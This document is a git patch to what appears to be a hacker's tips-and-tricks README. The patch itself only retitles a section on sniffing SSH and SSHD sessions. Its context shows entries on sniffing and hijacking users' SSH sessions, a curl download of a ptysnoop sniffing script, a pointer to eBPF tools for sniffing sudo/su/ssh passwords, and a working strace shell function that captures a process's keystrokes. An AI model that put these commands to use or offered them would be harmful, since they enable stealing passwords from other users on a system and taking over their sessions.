From e77fa3250591a91387a91fb22835a65bea20764d Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 29 Aug 2024 11:23:11 +0100 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4f7bca0..ce356ee 100644 --- a/README.md +++ b/README.md @@ -95,7 +95,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Sniff a user's SHELL session](#session-sniffing) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 2. [Sniff all SHELL sessions with eBPF](#bpf) - 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) + 1. [Sniff a user's SSH or SSHD session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) 1. [Hijack / Take-over a running SSH session](#hijack) @@ -2087,7 +2087,7 @@ curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/pty Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks). -**10.iv Sniff a user's outgoing SSH session or bash with strace** +**10.iv Sniff a user's SSH, bash or SSHD session with strace** ```sh tit() { strace -e trace="${1:?}" -p "${2:?}" 2>&1 | stdbuf -oL grep "^${1}"'.*= [1-9]$' | awk 'BEGIN{FS="\"";}{if ($2=="\\r"){print ""}else{printf $2}}'